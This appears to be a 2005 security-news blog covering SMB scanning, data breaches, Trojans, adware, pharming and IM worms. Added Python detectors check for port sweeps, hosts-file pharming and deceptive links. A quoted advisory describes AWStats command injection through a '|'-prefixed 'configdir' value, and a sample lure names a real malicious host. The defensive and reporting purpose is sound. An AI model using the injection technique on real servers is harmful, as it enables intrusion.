Researchers at Symantec Corp.'s DeepSight Network have detected a surge in scans on Port 445, an indication that malicious hackers may have already created exploits for a flaw in Microsoft Corp.'s implementation of the SMB (Server Message Block) protocol.
In Windows 2000, Windows XP and Windows Server 2003, Microsoft uses TCP Port 445 to run SMB directly over TCP/IP to handle the sharing of files, printers, serial ports, and also to communicate between computers.
The vulnerability, which was rated "critical," was patched one week ago in Microsoft's MS05-027 bulletin, and the increased noise on that port could be the first sign that a password brute force attack is imminent, Symantec DeepSight warned.
A spokesperson for Microsoft's Security Response Center said the company was not aware of any active attempts to exploit the vulnerability.
"Port scanning is an activity that may be indicative of an attempt to discover attack vectors against any vendor product and is not an activity unique to Microsoft products," she added.
She said software engineers at Redmond would continue to analyze and monitor for any malicious activity, but stressed that she was not aware of any customers being attacked via scanning of TCP Port 445 and that Microsoft had not received any indication of malicious activity associated with MS05-027.
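A surge like the one DeepSight reported shows up at the perimeter as many distinct external sources hitting 445, and as individual sources sweeping 445 across many internal hosts. The block below is an added example for this page, not Symantec's or Microsoft's code: it runs two such checks over a handful of constructed firewall log lines. The log format, the RFC 1918 "internal" list (internal SMB traffic is normal and must not count as scanning) and the baseline figure are all assumptions.

```python
"""Added example (not DeepSight code): flag a TCP/445 sweep and a surge of
distinct external sources in firewall logs. Log lines and format are constructed."""
import ipaddress
from collections import defaultdict

# Constructed perimeter log: timestamp src dst proto dport action
LOG = """\
2005-06-21T10:00:01 198.51.100.7 192.0.2.10 tcp 445 DROP
2005-06-21T10:00:01 198.51.100.7 192.0.2.11 tcp 445 DROP
2005-06-21T10:00:02 198.51.100.7 192.0.2.12 tcp 445 DROP
2005-06-21T10:00:02 198.51.100.7 192.0.2.13 tcp 445 DROP
2005-06-21T10:00:09 203.0.113.4 192.0.2.10 tcp 445 DROP
2005-06-21T10:00:09 203.0.113.4 192.0.2.11 tcp 445 DROP
2005-06-21T10:00:10 203.0.113.4 192.0.2.12 tcp 445 DROP
2005-06-21T10:00:15 10.1.1.5 192.0.2.10 tcp 445 ACCEPT
2005-06-21T10:00:20 198.51.100.9 192.0.2.10 tcp 80 ACCEPT
2005-06-21T10:00:21 198.51.100.9 192.0.2.10 tcp 443 ACCEPT
2005-06-21T10:00:40 198.51.100.22 192.0.2.10 tcp 445 DROP
"""

# Assumed internal ranges (RFC 1918): file sharing from these is expected traffic.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_log(text):
    """One dict per log line; blank lines are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, proto, dport, action = line.split()
        records.append({"ts": ts, "src": src, "dst": dst, "proto": proto,
                        "dport": int(dport), "action": action})
    return records


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def _external_hits(records, port):
    """TCP records to `port` whose source is outside the internal ranges."""
    for r in records:
        if r["proto"] == "tcp" and r["dport"] == port and not is_internal(r["src"]):
            yield r


def port_sweepers(records, port=445, min_targets=3):
    """External sources that touched at least min_targets distinct hosts on
    `port` (a horizontal sweep). Returns {src: distinct target count}."""
    targets = defaultdict(set)
    for r in _external_hits(records, port):
        targets[r["src"]].add(r["dst"])
    return {src: len(d) for src, d in targets.items() if len(d) >= min_targets}


def source_surge(records, port=445, baseline=1, factor=2.0):
    """(distinct external sources on `port`, True if that exceeds factor x baseline).
    `baseline` is whatever the same window looked like in previous days."""
    sources = {r["src"] for r in _external_hits(records, port)}
    return len(sources), len(sources) >= baseline * factor


if __name__ == "__main__":
    recs = parse_log(LOG)
    print("sweepers:", port_sweepers(recs))
    print("surge:", source_surge(recs))
```

On the sample, two external hosts are sweeping 445 and the distinct-source count is three against an assumed baseline of one, so both checks fire; the internal 10.1.1.5 connection is ignored, and the single probe from 198.51.100.22 is counted toward the surge but not reported as a sweep. The baseline is the part a practitioner has to supply from their own history; without it a count of distinct sources is just a number.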

Wednesday, June 22, 2005
PROVIDENCE, R.I. - A security hole that allowed easy access to the purchase information of millions of CVS Corp.'s loyalty card customers prompted the company to pull Internet access to the data on Tuesday.
The Woonsocket-based drugstore chain, which has issued 50 million of the cards, said it would restore Web-based access to the information after it creates additional security hurdles.
The data security flaw in the ExtraCare card service was exposed Monday by the grassroots group Consumers Against Supermarket Privacy Invasion and Numbering, or CASPIAN.
It said anyone could learn what a customer had purchased with an ExtraCare card by logging on to a company Web site with the card number, the customer's zip code and first three letters of the customer's last name.

Saturday, June 18, 2005
The FDIC has notified former and current employees of the agency that personal data including name, date of birth, salary, Social Security number and other information had been stolen several months ago.
Although the data theft was discovered in March and letters were sent to affected employees at that time, the FBI subsequently found that data of all former and current Federal Deposit Insurance Corp. employees—not only those notified by the FDIC in March—had been compromised.
Not only is the security breach embarrassing for the FDIC, it's also ironic, because the FDIC's job is to issue alerts to financial institutions about how to handle sensitive information, said Gerry Gebel, senior analyst at Burton Group, a Midvale, Utah, research and advisory firm.
The security breach at the FDIC is just the latest in a series of high-profile cases of identity thefts.
In March, for example, Bank of America Corp. lost several data tapes containing personal information on more than 1 million federal employees.
Also in March, BJ's Wholesale Club Inc. disclosed that customer information was compromised—something the Federal Trade Commission attributes to the wholesale club failing to encrypt data.
To help stem the rising tide of identity theft, Congress is currently mulling over several potential laws that, similar to California SB 1386 and those in process in several other states, would require organizations disclose any unauthorized acquisition of information.
In the U.S. Senate, Dianne Feinstein, D-Calif., has introduced such a bill, dubbed the Notification of Risk to Personal Data Act.
Meanwhile, U.S. Rep. Melissa L. Bean, D-Ill., has introduced a companion bill that would require the government or any business that owns or licenses electronic data containing personal information to notify anybody whose personal information has been compromised. The bills also would create a clearinghouse to collect, track and report data breaches.
Sens. Charles Schumer, D-N.Y., and Bill Nelson, D-Fla., also introduced an identity theft bill that would give broader authority to the Federal Trade Commission and require more disclosure.
The Schumer-Nelson ID Theft Prevention Bill will create an FTC Office of Identity Theft to help victims of ID theft reclaim their identities more easily, regulate data merchants, and force companies to inform consumers in plain English that their information may be sold or given to an unaffiliated third party without their consent unless a box is checked.
A report on Trojan e-mail attacks against critical-infrastructure systems in the U.K. highlights an emerging trend away from mass-mailing worms and viruses to far more targeted ones, analysts said.
The U.K.'s National Infrastructure Security Co-Ordination Centre yesterday released a report (PDF format) disclosing that more than 300 government departments and businesses were targeted by a continuing series of e-mail attacks designed to covertly gather sensitive and economically valuable information.
Unlike with phishing and mass-mailing worms, the attackers appear to be going after specific individuals who have access to commercially or economically privileged information, the report said.
The attacks involved the use of e-mails containing so-called Trojan programs or links to Web sites containing Trojan files. Once installed on a user's system, Trojans covertly run in the background and perform a variety of functions, including collecting usernames, passwords and system information; scanning of drives; and uploading of documents and data to remote computers.
"The e-mails use social engineering to appear credible, with subject lines often referring to news articles that would be of interest to the recipient," the report said. "In fact, they are 'spoofed,' making them appear to originate from trusted contacts, news agencies or government departments."
The report highlights how hackers are starting to tailor their attacks and go after specific high-value targets instead of simply launching mass-mailing worms and viruses, said Mark Sunner, chief technology officer at MessageLabs Ltd., a New York-based provider of e-mail security services.
BitTorrent, the beloved file-sharing client and protocol that provides a way around bandwidth bottlenecks, has become the newest distribution vehicle for adware/spyware bundles.
Public peer-to-peer networks have always been associated with adware program distributions, but BitTorrent, the program created by Bram Cohen to offer a new approach to sharing digital files, has managed to avoid the stigma.
According to Chris Boyd, a renowned security researcher who runs the VitalSecurity.org nonprofit resource center, the warm and fuzzy world of BitTorrent has been invaded by a massive software distribution campaign linked to New York-based adware purveyor Direct Revenue LLC.
"This is the marketing campaign to end all marketing campaigns," said Boyd, the Microsoft Security MVP (most valuable professional) known throughout the security industry by the "Paperghost" moniker.
Boyd, widely known for chronicling spyware, hacking and malware exploits, has published details of the BitTorrent distributions and identified Direct Revenue and Marketing Metrix Group as the companies responsible for the rigged files.
Boyd said he got the first inkling that BitTorrent was a major adware distribution vehicle while searching for the source of Direct Revenue's Aurora, an adware program that includes the prevalent "nail.exe" component. Sifting through mountains of HijackThis logs posted on security forums, Boyd said the answer was staring him in the face. (HijackThis is a popular freeware spyware removal tool that keeps detailed logs of Windows PC scans).
A BitTorrent user downloading a movie clip only becomes aware of the associated adware after the files are reassembled. At that stage, when the user attempts to load the reassembled file, he or she is greeted by an installation notice for an adware bundle distributed by MMG (Marketing Metrix Group), a Canadian company that specializes in P2P network marketing.
Officials from MMG did not respond to queries for comment. On its Web site, the company lists BitTorrent as a lucrative adware distribution vehicle. "Although Bit Torrent is a file format and not a P2P Network … [it] is the fastest growing protocol for file sharing online. Many top Bit Torrent sites such as SuprNova, LokiTorrent and Bit Tower support millions of downloads daily," said MMG, which lists PartyPoker.com and Hotbar.com among other clients on its roster.
MasterCard International on Friday said a security breach of credit card payment data had exposed about 40 million cards of all brands to potential fraud in what one analyst said was the biggest privacy breach ever.
About 13.9 million of those credit cards at risk are MasterCard-branded cards, the company said. An unauthorized person infiltrated cardholder data at a company which processes transactions.
There has been a string of episodes this year in which companies have reported stolen or misappropriated customer data. Bank of America Corp., ChoicePoint Inc. and Reed Elsevier are among the companies that have reported breaches.
MasterCard International said its security staff identified the breach at Tucson-based CardSystems Solutions Inc., a third-party processor of payment card data. Third party processors process transactions on behalf of financial institutions and merchants.
MasterCard said security vulnerabilities in CardSystems' systems allowed an unauthorized individual to infiltrate CardSystems' network and access cardholder data.
CardSystems has already taken steps to improve the security of its systems, MasterCard said, adding that it was giving the company "a limited amount of time" to demonstrate compliance with MasterCard security requirements.
MasterCard said it immediately notified its customer banks of specific card accounts that may have been subject to compromise so they can take the measures to protect their cardholders.

Monday, June 13, 2005
Trojan horse programs were in the news again this week, as the Israeli newspaper Haaretz published news of a massive industrial espionage ring that used custom-designed Trojans to steal trade secrets and other sensitive information from leading companies.
The case illustrates the growing threat to enterprises from surreptitious monitoring programs, which are increasingly being used in sophisticated and coordinated attacks. While news of virus and worm outbreaks still dominates the headlines, Trojans could be a silent epidemic affecting untold numbers of companies, according to one leading malicious code researcher.
Updated: A security researcher says Google's search-based ads play a part in browser toolbars that violate the company's stand against spyware and questionable download practices.
Google's sponsored-link ads may have helped turn the world's best-known search engine into a financial powerhouse, but they also are coming under attack for contributing to spyware practices that undermine trust on the Web.
Anti-spyware researcher Ben Edelman this week criticized Google Inc. for playing a role in the distribution of browser toolbars that he says violates Google's own principle about software downloads.
AWStats Remote Command Execution Vulnerability
iDEFENSE Security Advisory 01.17.05:
I. BACKGROUND
AWStats is a free tool that generates advanced web, ftp or mail server
statistics, graphically. More information about AWStats is available
from:
http://awstats.sourceforge.net
II. DESCRIPTION
Remote exploitation of an input validation vulnerability in AWStats
allows attackers to execute arbitrary commands under the privileges of
the web server.
The problem specifically exists when the application is running as a
CGI script on a web server. The "configdir" parameter contains
unfiltered user-supplied data that is utilized in a call to the Perl
routine open() as can be seen here on line 1082 of awstats.pl:
if (open(CONFIG,"$searchdir$PROG.$SiteConfig.conf"))
The "searchdir" variable holds the value of the parameter provided by the attacker in "configdir". Because Perl's two-argument open() treats a leading "|" as a request to pipe to a command, an attacker can cause arbitrary commands to be executed by prefixing the value with the "|" character.
V. WORKAROUND
Add a filter around the "configdir" parameter by replacing the following
line:
if ($QueryString =~ /configdir=([^&]+)/i)
{
$DirConfig=&DecodeEncodedString("$1");
}
With:
if ($QueryString =~ /configdir=([^&]+)/i)
{
$DirConfig=&DecodeEncodedString("$1");
$DirConfig=~tr/a-z0-9_\-\/\./a-z0-9_\-\/\./cd;
}

Saturday, June 11, 2005
AMSTERDAM - E-mails claiming pop star Michael Jackson, on trial on sex abuse charges, has tried to kill himself are being spread by hackers as a means to break into computers, a British anti-virus firm said on Friday.
The hackers have sent emails with the subject "Re: Suicidal attempt" and the message text: "Last night, while in his Neverland Ranch, Michael Jackson has made a suicidal attempt", said security software specialists at Sophos.
The email asks recipients to click on a link that takes them to a Web site which secretly installs malicious code on their computers.
"If you click on the link, the Web site displays a message saying it is too busy, which may not surprise people who think it might contain genuine breaking news about Michael Jackson," said Carole Theriault, security consultant at SophosLabs.

Thursday, June 09, 2005
DNS poisoning requires elite hacking skills, which is why most analysts believe it falls short of a large-scale threat. But before you get too complacent, take notice of the poor man's pharm, a less sophisticated and far less costly way to hijack Web page requests and forward unsuspecting users to counterfeit sites.
Instead of harvesting requests from a DNS server, the "retail" version of pharming is a desktop affair in which a user unwittingly downloads spyware, a Trojan horse or a virus. This malware simply intercepts Web site requests and shunts the user to a bogus Web site. The rest is the now too familiar game of capturing your personal information and then redirecting you to the authentic site. Some say such low-rent pharming accounts for the vast majority of incidents. "The bad guys are always trying to stay low enough in the food chain to escape notice but high enough to make money,"
Another technique, somewhere between DNS poisoning and desktop hijacking, involves search engines. This scam takes advantage of the fact that users forget URLs -- for a bank Web site, for example. The user conducts a search on Google, gets a page of results, and clicks the first one that looks right. But in fact it's a bogus site.
"If you can tag your site so it shows at the top of a search query result page, you can be in the pharming business," said Jim Stickley, chief technology officer and co-founder of TraceSecurity. "This is what legitimate businesses do all the time -- namely, optimize their sites for various search engines."
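The "retail" pharming described above lives on the victim's machine rather than on a DNS server. One long-standing way desktop malware redirects requests is by rewriting the local hosts file so that a bank's host name resolves to an attacker-controlled address; the article does not name the mechanism, so that is an assumption here. The following is an added example, not code from the article or from any of the companies it quotes: a small checker that parses hosts-file text and flags watched domains mapped to anything other than a loopback or unspecified address. The sample hosts content, the 203.0.113.10 address and the watched domain names are constructed.

```python
import ipaddress

# Constructed hosts-file content, not a capture from a real machine.
SAMPLE_HOSTS = """\
# standard entries
127.0.0.1       localhost
::1             localhost
# entries a desktop pharming tool might add
203.0.113.10    www.examplebank.test login.examplebank.test
0.0.0.0         ad.tracker.test
"""

# Domains that should never be overridden locally (constructed names).
WATCHED_DOMAINS = {"examplebank.test", "paymentsite.test"}

def parse_hosts(text):
    """Yield (ip, hostname) pairs, skipping comments and blank lines."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:
            yield ip, name.lower()

def is_local_address(ip):
    """True for loopback (127.0.0.1, ::1) and unspecified (0.0.0.0, ::) addresses."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_unspecified

def suspicious_entries(text, watched=WATCHED_DOMAINS):
    """Return (ip, hostname) entries that send a watched domain, or any of its
    subdomains, to a non-local address. Blocklist-style 0.0.0.0 entries are ignored."""
    hits = []
    for ip, name in parse_hosts(text):
        if is_local_address(ip):
            continue
        if any(name == d or name.endswith("." + d) for d in watched):
            hits.append((ip, name))
    return hits

if __name__ == "__main__":
    for ip, name in suspicious_entries(SAMPLE_HOSTS):
        print("hosts file overrides %s -> %s" % (name, ip))
```

Running the check on the sample reports the two bank entries and nothing else. On a real system the same function can be pointed at the platform's hosts file, and the watched set at whatever domains matter to the organization.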
Apple on Wednesday posted Security Update 2005-006. The new update is ready for download from Apple’s Web site. Separate downloads are available for Mac OS X v10.3.9 and Mac OS X v10.4.1. Apple said the download is recommended for all affected Mac users.
The security update for Mac OS X v10.4.1 contains those Bluetooth and PHP improvements, as well as a buffer overflow correction and other improvements to AFP Server, correct handling of cleanup of poorly-formatted PDF documents by CoreGraphics and a security improvement to prevent unprivileged users from launching commands into root sessions; more secure folder permissions to protect the cache folder and Dashboard system widgets; removal of a vulnerability in the launchd command; a correction to LaunchServices’ query code; a change to MCX client involving Portable Home Directories; modification of NFS exporting code; and correction of a buffer overflow problem in “vpnd.” More details are available from Apple’s Web site.

Wednesday, June 08, 2005
New versions of the Mozilla Foundation's browsers have reintroduced a 7-year-old flaw that makes them vulnerable to spoofing attacks, security advisory company Secunia said yesterday.
Secunia first publicized the flaw last summer, warning that a feature built into most browsers for years was a security liability. The firm argued that a feature allowing one Web page to load arbitrary content into a frame of another page could allow an attacker to, for example, substitute his own log-in window on a bank's Web site. The feature was found in Internet Explorer, Mozilla, Opera, Safari and Mozilla derivatives such as Konqueror.
"We believe that it is important that Microsoft and the other vendors seriously consider the minor gains from such 'functionality' against the possible consequences for their customers," said Secunia Chief Technology Officer Thomas Kristensen last summer at the time of the flaw. "In our opinion, this is a vulnerability and should be treated as such, whether the vendors implemented this intentionally or not."
The Mozilla Project said it is investigating the report, and a moderator of the organization's online support site said the flaw had not been exploited. "To protect yourself, close all other windows/tabs before accessing a site where you routinely put in a secure password (your bank or PayPal account), or your bank or credit card details (e.g., Amazon), or other sensitive data," the moderator said.

Friday, June 03, 2005
A new version of the Netscape Web browser is being criticized by spyware experts for failing to notify Web surfers when they're visiting Web sites that distribute the noxious monitoring programs.
Netscape 8's Trust Rating System, which warns users about insecure Web sites, gives a "green light" to Web sites that download spyware onto users' machines, according to Ben Edelman, a student at Harvard University Law School and an expert on spyware software.
In a conversation Wednesday, AOL spokesman Andrew Weinstein acknowledged that some spyware sites received an "unknown" rating from the browser. The spokesman subsequently confirmed evidence viewed by eWEEK magazine suggesting that other spyware sites received a "trusted" rating. The company is working to correct the problem with the new browser.
The critiques are the latest bump in the road for Netscape 8, which was released this month. It was patched almost immediately to cover a host of known holes in its code, which is based on the popular Firefox browser, and to fix a conflict with Microsoft's Internet Explorer browser.
UPDATED: In an advisory posted by enterprise IM vendor IMlogic Wednesday, officials warned of a new worm spread by old means: getting users to click on a URL that purports to come from a friend on their buddy list.
The latest threat to AOL's instant messaging (IM) platform, AIM, again targets users' penchants to blindly click on links supplied by friends. The Gpic.aol worm comes with a message saying, "damn this looks just like me lol" and a link to what is displayed as pictures.google.com.
In reality, the displayed URL obscures the real Web site at newpeople.no-ip.info, which then downloads onto the user's system, collects the names in the buddy list and sends the same message to all of them.
Gpic.aol is considered a medium-level risk threat; it doesn't actually deliver a payload that allows the malware writer to gain remote access to the computer or corrupt or erase data on the hard drive.
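The lure above relies on a link whose visible text names one host (pictures.google.com) while the target is another (newpeople.no-ip.info). That mismatch is mechanically detectable. The following is an added example, not code from IMlogic or the article: it extracts anchor elements from an HTML message fragment and reports links whose visible text is a host name that differs from the host the href actually points to. The sample message is constructed from the lure text quoted above; the HTML markup around it and the second, harmless link are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# What a bare host name looks like once the link text has been lower-cased.
HOST_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")

class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in a fragment."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip().lower()))
            self._href = None

def host_of(url):
    """Host part of a URL; 'host/path' without a scheme is read as http://host/path."""
    if "://" not in url:
        url = "http://" + url
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:          # e.g. an unbalanced '[' in the text
        return ""

def deceptive_links(fragment):
    """Return (shown_host, real_host, href) for links whose visible text is a
    host name that differs from the host the href actually points at."""
    collector = LinkCollector()
    collector.feed(fragment)
    findings = []
    for href, text in collector.links:
        if not HOST_RE.match(text):
            continue                      # text is not a host name, nothing to compare
        real = host_of(href)
        if real and real != text:
            findings.append((text, real, href))
    return findings

# Constructed message modelled on the lure quoted above; the real target host is the
# one the article names, the markup and the second link are assumptions.
SAMPLE_MESSAGE = (
    'damn this looks just like me lol '
    '<a href="http://newpeople.no-ip.info/">pictures.google.com</a> '
    '<a href="http://www.google.com/">www.google.com</a>'
)

if __name__ == "__main__":
    for shown, real, href in deceptive_links(SAMPLE_MESSAGE):
        print("link text says %s but points at %s (%s)" % (shown, real, href))
```

Only links whose text is itself a host name are compared; ordinary "click here" style text is left alone, so the check produces findings only where the displayed host is actively misleading.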
A four-member panel of cybercrime fighters dissected the ominous "phishing without a lure" pharming attacks in an "eCrime Calling" workshop at the InBox e-mail security conference here, co-sponsored by the Anti-Phishing Working Group.
Oliver Friedrichs, security manager at Symantec Corp.'s security response center, said the increase in pharming attacks has produced a steep rise in cybercrime statistics. The company's DeepSight global Internet sensor network recorded a 360% increase in phishing or pharming e-mails during the last half of 2004. DeepSight's 2 million honeypots and 4,000 devices recorded 9 million phishing e-mails for the last half of 2004, dwarfing the 2 million identified in last year's first six months. In a phishing scam, e-mail messages that look like they come from a legitimate Web site, such as a bank, are sent to users to lure them into entering sensitive information.
DeepSight analysis shows that 54% of all malware is designed to harvest confidential information from users, up from 44% in the second half of 2004 and 36% in the first half, Friedrichs said. Once infected, the top targets of the botnets are financial services companies followed by manufacturers. "Full Story"

Friday, May 27, 2005
The Trojan downloader (download-aag AKA Pgpcoder) exploits a well-known Internet Explorer vulnerability (MS04-023) to download hostile code onto vulnerable Windows boxes. It then searches for files with various extensions and encodes them. The original documents are deleted and the newly encoded files become unreadable. The malware also drops a message onto the system with instructions on how to buy the tool needed to decode the files, demanding payment of $200 from victims if they ever want to see their documents again.
Security experts are warning Internet users about a new piece of software that poses as a spyware-removal tool but is actually being used to persuade unsuspecting Internet users to download spyware programs and Trojans.
The program, SpywareNo, is installed on Internet users' computers without warning, can be difficult to remove and may be accompanied by malicious programs that hijack victims' Web browsers, according to interviews with spyware experts.
The company behind the new tool claims that it is the victim of unscrupulous online advertisers who bundle the product with noxious wares. Yet nothing on its site indicates that it has been a victim, and no clearly defined disclaimer appears there.
But at least one spyware expert says the new application is just the latest example of so-called "rogue anti-spyware" programs that exploit user naiveté and frustration with spyware.
SpywareNo is advertised as a desktop security software suite, with integrated firewall, application security and intrusion detection features, according to spywareno.com, the program's official Web site. Personally it certainly does not look that way.
This is a warning like the one about "SpywareAssassin". If I were SpywareNo and this had actually happened as claimed, I would be pushing out corrective measures on the front page of the company site. The FTC busted "SpywareAssassin" (full article). I am sure this is but a trend to dupe people. It took some time for the FTC to act on SpywareAssassin; perhaps that is the time frame these people will operate in. The sad part is this only makes unknown software companies suspect. At the end of the day the only people to benefit long term are the large software vendors, making it very hard for startups like LavaSoft and SpyBot, which offer great free apps which do work.

Thursday, May 26, 2005
The CIA is conducting a secretive war game, dubbed "Silent Horizon," this week to practice defending against an electronic assault on the same scale as the Sept. 11 terrorism attacks.
The three-day exercise, ending Thursday, was meant to test the ability of government and industry to respond to escalating Internet disruptions over many months, according to participants. They spoke on condition of anonymity because the CIA asked them not to disclose details of the sensitive exercise taking place in Charlottesville, Va., about two hours southwest of Washington.
The simulated attacks were carried out five years in the future by a fictional alliance of anti-American organizations, including anti-globalization hackers. The most serious damage was expected to be inflicted in the war game's closing hours.
The national security simulation was significant because its premise -- a devastating cyberattack that affects government and parts of the economy with the same magnitude as the Sept. 11, 2001, suicide hijackings -- contravenes assurances by U.S. counterterrorism experts that such far-reaching effects from a cyberattack are highly unlikely. Previous government simulations have modeled damage from cyberattacks more narrowly.
"You hear less and less about the digital Pearl Harbor," said Dennis McGrath, who helped run three similar war games for the Institute for Security Technology Studies at Dartmouth College. "What people call cyberterrorism, it's just not at the top of the list."
http://www.ists.dartmouth.edu/
TimesUnion

Monday, May 23, 2005
The Microsoft Windows Malicious Software Removal Tool checks Windows XP, Windows 2000, and Windows Server 2003 computers for and helps remove infections by specific, prevalent malicious software, including Blaster, Sasser, and Mydoom. When the detection and removal process is complete, the tool displays a report describing the outcome, including which, if any, malicious software was detected and removed. The tool creates a log file named mrt.log in the %WINDIR%\debug folder.
This tool is not a replacement for an anti-virus product. To help protect your computer, you should use an anti-virus product. "Click Here"
"Learn More"
- Provides a comprehensive PC health service
Windows OneCare helps protect and maintain your computer with an integrated service that includes antivirus, firewall, PC maintenance, and data backup and restore functionality.
- Works automatically to help provide hassle-free protection and maintenance
Windows OneCare automatically takes care of key tasks such as running antivirus scans, updating the antivirus engine and virus definitions, updating the firewall, and running a monthly PC tune-up to improve and maintain your computer’s performance.
- Continuously evolves to help protect you from the latest threats
Because Windows OneCare is a service, you will not need to wait for a new version in order to be protected from new threats or to take advantage of new features. Windows OneCare updates itself automatically over the Internet so you always have the latest technology.

Saturday, May 21, 2005
Wayne Cunningham noted that Ask Jeeves is a fairly big player in the adware market. I guess I should have known this, but last year Ask Jeeves bought a company with the mild-mannered name of Interactive Holdings. But look behind the curtain and see what unsavory characters lurk. Interactive Holdings was a front for iWon, My Search, My Way, and My Web Search. Ask Jeeves doesn’t exactly hide the fact; you can find these companies listed on the Ask Jeeves Web site.
My opinion of Ask Jeeves, never particularly high, has suffered a great deal due to this revelation, old news though it is. I’m generally amazed at how much financial backing adware companies get. I know that they are pulling in plenty of money, and I’ve heard of venture capitalists investing in them. But I don’t think the investors realize they are buying into a very short term business.


Friday, May 20, 2005
Leading the legislative pack, the governor of Washington signed an antispyware bill with serious penalties for violators. The law defines specific unlawful behavior, such as hijacking home and search pages, and displaying excessive numbers of pop-up ads. This law also takes on deceptive installation practices and software that reinstalls itself. The section on reinstallation makes it illegal to “Prevent, through intentionally deceptive means, an owner or operator’s reasonable efforts to block the installation or execution of, or to disable, computer software by causing the software that the owner or operator has properly removed or disabled automatically to reinstall or reactivate on the computer”. There’s some leeway in this section, since it requires “intentionally deceptive means”, which may be hard to prove in court.
Because it’s a Washington state law, violations have to occur in Washington for a prosecution to take place. But since it calls for one hundred thousand dollars in damages per violation, a lot of people may consider bringing their laptop on a vacation to the state.

Thursday, May 19, 2005
Published: February 9, 2005 | Updated: February 11, 2005
Microsoft is aware of exploit code available on the Internet that targets an issue addressed this week by Microsoft Security Bulletin MS05-009. Microsoft is not currently aware of any active attack utilizing this code or any customer impact. We will continue to actively monitor the situation and provide updated customer information and guidance as necessary.
Our investigation of this exploit code has verified that it does not affect users who have installed the MS05-009 update for both Microsoft Windows and MSN Messenger. Microsoft continues to recommend customers apply the MS05-009 updates to the affected products by enabling Automatic Updates in Windows as well as installing the updated version of MSN Messenger.
News Story by John E. Dunn

MAY 18, 2005 (IDG NEWS SERVICE) - Users of AOL’s instant messaging software, AIM, should be on the lookout for an innovative new worm variously named "Oscarbot-B" and "Doyorg" by antivirus companies. "Full Story".